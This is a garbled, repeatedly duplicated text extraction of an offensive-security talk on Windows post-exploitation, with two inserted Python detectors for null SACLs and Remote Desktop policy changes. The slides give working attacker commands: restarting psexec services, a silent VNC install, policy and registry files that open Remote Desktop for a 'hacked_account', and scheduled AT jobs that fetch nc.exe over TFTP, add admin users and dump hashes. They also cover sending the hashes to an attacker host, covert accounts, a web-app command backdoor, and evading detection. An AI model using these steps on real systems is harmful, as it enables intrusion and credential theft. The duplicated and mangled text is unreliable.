bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use / re-use
– Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
– Beyond EIP – the theoretical tool development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
– Thanks to:
• All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
• HD Moore especially, for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
Slide 26
Persistence
• Take the concept to another level
– Add a decoder to a web app
– Look for a "trigger" string combination in form fields
– If Name = John Smith and Age = 42 then execute the contents of the Address field
– URL encode form entries containing commands
– Have an identifier "stub" in the encoded data for the app to find
Slide 27
Persistence
• Mixing Stealth with Persistence
– Further encoding
– Take entries from all fields
– Concat them
– "Decode" commands
– Rotational ciphers (rot13, Caesar)
– Even more complex obfuscation
Slide 28
Persistence
• Covert Accounts
– Add an account / re-enable one
– Modify local account policies to allow access
• Ex: SUPPORT_3848576b1, guest
– Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files / new accounts
– Unlikely to be discovered
Slide 29
• DEMOS
Slide 30
Stealth / Evading Detection
Slide 31
Stealth / Evading Detection
• Hiding your activity
– From:
• IDS
• AV
• LOGGING
• Suspicious users & admins
• Firewalls
• Process listing
Slide 32
Stealth / Evading Detection
• Why Stealth?
– If you get caught you get stopped
– The longer you can operate undetected, the more you can accomplish
– Admins won't fix problems they don't know exist (helps persistence)
– On a pen test you should also be testing the organization's detection and response capabilities
Slide 33
Stealth / Evading Detection
• Goals
– Keep the system operable
• If it breaks you can't use it
• Someone will come fix it
– Operate without fear of detection
– Robustness
• Hiding shouldn't require constant attention
– DON'T LOOK MALICIOUS
Slide 34
Stealth / Evading Detection
• Manual / Existing Tools
– Rootkits, rootkits, rootkits
– Meterpreter
– Encryption
• Shellcode encoders for IDS evasion
– Log cleaners
– Packers
– Covert channels / Steganography
– Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research
Slide 35
Stealth / Evading Detection
• Different Perspective
– DON'T BE AN ANOMALY
– Hide in plain sight
• Many tools have ONLY malicious uses
• Make your intent hard to determine
– Be noisy on one to divert attention from another
Slide 36
Stealth / Evading Detection
• Different Perspective
– Know the target's environment better than they do
• If they don't use encryption, maybe you shouldn't either
• Change strategies to match the environment's normal behavior
– Don't always default to exploits
• See the Tactical Exploitation talk
• IDSs can't see normal behavior that is malicious
Slide 37
Stealth / Evading Detection
• Using Windows security objects for stealth
– Auditing of securable objects is controlled by SACLs
– Null SACL = No Auditing = No Logs
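The "Null SACL = No Logs" point above is something a defender can check directly: in the SDDL text form of a security descriptor a NULL SACL shows up as a missing S: section, and a SACL with no audit ACEs (or audit ACEs without the SA/FA flags) is just as silent. The Python below is an added example, not code from the talk; it classifies SDDL strings by whether their SACL can produce an audit record at all, and the SDDL samples are constructed.

```python
"""Classify SDDL security descriptors by whether their SACL can ever log.

Added example, not code from the talk. Inputs are SDDL strings (the text form
Windows uses for security descriptors); the samples below are constructed.
"""
import re

# ACE types that generate audit records: system audit, object audit, callback audit.
AUDIT_ACE_TYPES = {"AU", "OU", "XU"}
# ACE flags that make an audit ACE fire on successful / failed access.
AUDIT_FLAGS = {"SA", "FA"}

SECTION_RE = re.compile(r"([OGDS]):")
ACE_RE = re.compile(r"\(([^)]*)\)")


def split_sddl(sddl):
    """Map section letter (O, G, D, S) to its raw body; no 'S' key means a NULL SACL."""
    sections = {}
    marks = list(SECTION_RE.finditer(sddl))
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(sddl)
        sections[m.group(1)] = sddl[m.end():end]
    return sections


def parse_acl(body):
    """Split an ACL body such as 'PAI(A;;KA;;;BA)(AU;SAFA;KA;;;WD)' into
    (acl_flags, list of ACEs), each ACE being its ';'-separated fields."""
    paren = body.find("(")
    acl_flags = body if paren < 0 else body[:paren]
    aces = [ace.split(";") for ace in ACE_RE.findall(body)]
    return acl_flags, aces


def two_letter_flags(field):
    """SDDL ACE flags are packed two-letter codes: 'CISA' -> {'CI', 'SA'}."""
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def audit_coverage(sddl):
    """Say whether accesses to this object can appear in the Security log:
      'no-sacl'        no S: section at all: NULL SACL, nothing is ever audited
      'empty-sacl'     S: present but holds no ACEs
      'no-audit-aces'  SACL holds only non-audit ACEs (e.g. an ML integrity label)
      'audit-no-flags' audit ACEs exist but carry neither SA nor FA, so never fire
      'audited'        at least one audit ACE fires on success or failure
    """
    sections = split_sddl(sddl)
    if "S" not in sections:
        return "no-sacl"
    _, aces = parse_acl(sections["S"])
    if not aces:
        return "empty-sacl"
    audit_aces = [ace for ace in aces if ace[0] in AUDIT_ACE_TYPES]
    if not audit_aces:
        return "no-audit-aces"
    for ace in audit_aces:
        flags = ace[1] if len(ace) > 1 else ""
        if two_letter_flags(flags) & AUDIT_FLAGS:
            return "audited"
    return "audit-no-flags"


def find_unaudited(sddl_by_name):
    """Sorted names of objects whose SACL cannot produce an audit record."""
    return sorted(name for name, sddl in sddl_by_name.items()
                  if audit_coverage(sddl) != "audited")


# Constructed samples: a registry key audited for Everyone, and three ways
# the same key can be made silent.
SAMPLES = {
    "hklm-run-audited": "O:BAG:SYD:(A;;KA;;;BA)(A;;KR;;;BU)S:(AU;SAFA;KA;;;WD)",
    "null-sacl": "O:BAG:SYD:(A;;KA;;;BA)(A;;KR;;;BU)",
    "sacl-emptied": "O:BAG:SYD:(A;;KA;;;BA)(A;;KR;;;BU)S:",
    "label-only": "O:BAG:SYD:(A;;KA;;;BA)(A;;KR;;;BU)S:(ML;;NW;;;LW)",
}

if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        print(f"{name:18} {audit_coverage(sddl)}")
    print("needs attention:", find_unaudited(SAMPLES))
```

An "audited" result only turns into events when the object-access audit policy is enabled on the host; the SACL is necessary, not sufficient.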
Slide 38
• DEMOS
– Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
– Use the credentials / access of another user
• Goals
– Change your identity at will
• User ID, domain credentials, sessions
• Impersonate system accounts
• Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
– Target users
• Who has access to what?
• Where is the data?
– Change identity
• Hijack credentials / sessions
• Abuse tokens
– Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
– Incognito (Metasploit)
• Enumerate / hijack tokens
– FU / FUTo
• Enable SYSTEM privileges
• Change process privileges (DKOM)
– SU / SUDO / KSU
– Process injection
– Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My
• What we want
– Privileges or SIDs
• What we get
– Access, Access, Access
• How we get it
– Incognito vs FUTo
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
– Support all post-exploitation activities
– Disabling detection technologies
– Enabling insecure or easy-to-use access software
Slide 47
Feature Modification
• Feature Modification is basically Securable Object Manipulation
– Remember all those Tokens and Security Descriptors?
– These can be modified programmatically and directly
• Not just through existing tools
– Stealth / persistence requirements
• May make it more advantageous to use custom tools
– Access objects programmatically
– Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
– PsExec: it's still cool (Thanks Mark)
• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
– Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
– Psexec was a great / awesome remote shell / command tool
– Everybody now disables clipbook, which psexec requires (l4m3)
– Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the service control tool, sc.exe
– net use \\target\ipc$ password /user:username
– sc \\target config netdde start= auto
– sc \\target config netddedsdm start= auto
– sc \\target config clipsrv start= auto
– sc \\target start netdde
– sc \\target start netddedsdm
– sc \\target start clipsrv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =
– This file will fix the policy settings that are in your way
– Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
– Then perform these commands:
• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
• secedit /configure /db newsecedit.sdb /cfg fix_ts_policy.ini
• gpupdate /force
• net start "terminal services"
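Every step of the procedure above leaves a trace in two text artifacts a defender can export and compare: the [Privilege Rights] section of a secedit INF (a new principal on the logon rights, deny rights blanked) and the Terminal Server registry key (fDenyTSConnections flipped to 0). The Python below is an added example, not code from the talk; it diffs a baseline rights export against a current one and reads the .reg export, and all three inputs are constructed samples (hacked_account is the slide's own placeholder name).

```python
"""Detect the Remote Desktop policy edits described above from exported text.

Added example, not code from the talk. Inputs: a baseline and a current
[Privilege Rights] export in secedit INF syntax and a .reg export of the
Terminal Server key. All three samples below are constructed.
"""
import re

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"


def parse_inf_rights(text):
    """Return {right_name_lowercase: [principals]} from the [Privilege Rights] section."""
    rights, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if in_section and "=" in line:
            name, _, value = line.partition("=")
            # Principals are comma separated (*SID or name); an empty right-hand
            # side means the right has been cleared entirely.
            rights[name.strip().lower()] = [p.strip() for p in value.split(",") if p.strip()]
    return rights


def parse_reg_dwords(text, key_path):
    """Return {value_name: int} for the dword values under key_path in a .reg export."""
    values, in_key = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_key = line.strip("[]").lower() == key_path.lower()
            continue
        m = re.match(r'"([^"]+)"=dword:([0-9a-fA-F]{8})$', line)
        if in_key and m:
            values[m.group(1)] = int(m.group(2), 16)
    return values


def diff_rights(baseline, current):
    """Principals added to or removed from any logon right, as readable findings."""
    findings = []
    for right in sorted(set(baseline) | set(current)):
        before, after = set(baseline.get(right, [])), set(current.get(right, []))
        findings += [f"{right}: added {p}" for p in sorted(after - before)]
        findings += [f"{right}: removed {p}" for p in sorted(before - after)]
    return findings


def rdp_policy_findings(baseline_inf, current_inf, reg_export):
    """Combine the rights diff with the registry switch the slide flips."""
    findings = diff_rights(parse_inf_rights(baseline_inf), parse_inf_rights(current_inf))
    ts = parse_reg_dwords(reg_export, TS_KEY)
    if ts.get("fDenyTSConnections") == 0:
        findings.append("fDenyTSConnections=0: incoming Remote Desktop connections are allowed")
    return findings


# Constructed baseline: RDP for Administrators (S-1-5-32-544) and Remote Desktop
# Users (S-1-5-32-555), console logon for Administrators and Users (S-1-5-32-545),
# Anonymous (S-1-5-7) denied remote interactive and network logon.
BASELINE_INF = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = *S-1-5-32-544,*S-1-5-32-555
seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-545
sedenyremoteinteractivelogonright = *S-1-5-7
sedenynetworklogonright = *S-1-5-7
"""

# Constructed export after the slide's fix_ts_policy.ini was applied: the
# placeholder account appears on both grant rights, both deny rights are empty.
CURRENT_INF = (BASELINE_INF
               .replace("*S-1-5-32-555", "*S-1-5-32-555,hacked_account")
               .replace("*S-1-5-32-545", "*S-1-5-32-545,hacked_account")
               .replace(" = *S-1-5-7", " ="))

# Constructed .reg export of the Terminal Server key after enable_ts.reg.
REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"""

if __name__ == "__main__":
    for finding in rdp_policy_findings(BASELINE_INF, CURRENT_INF, REG_EXPORT):
        print(finding)
```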
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
– The Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
– Clipbook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled
• net use \\target\ipc$ password /user:username
• at \\target 12:00pm command
• Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
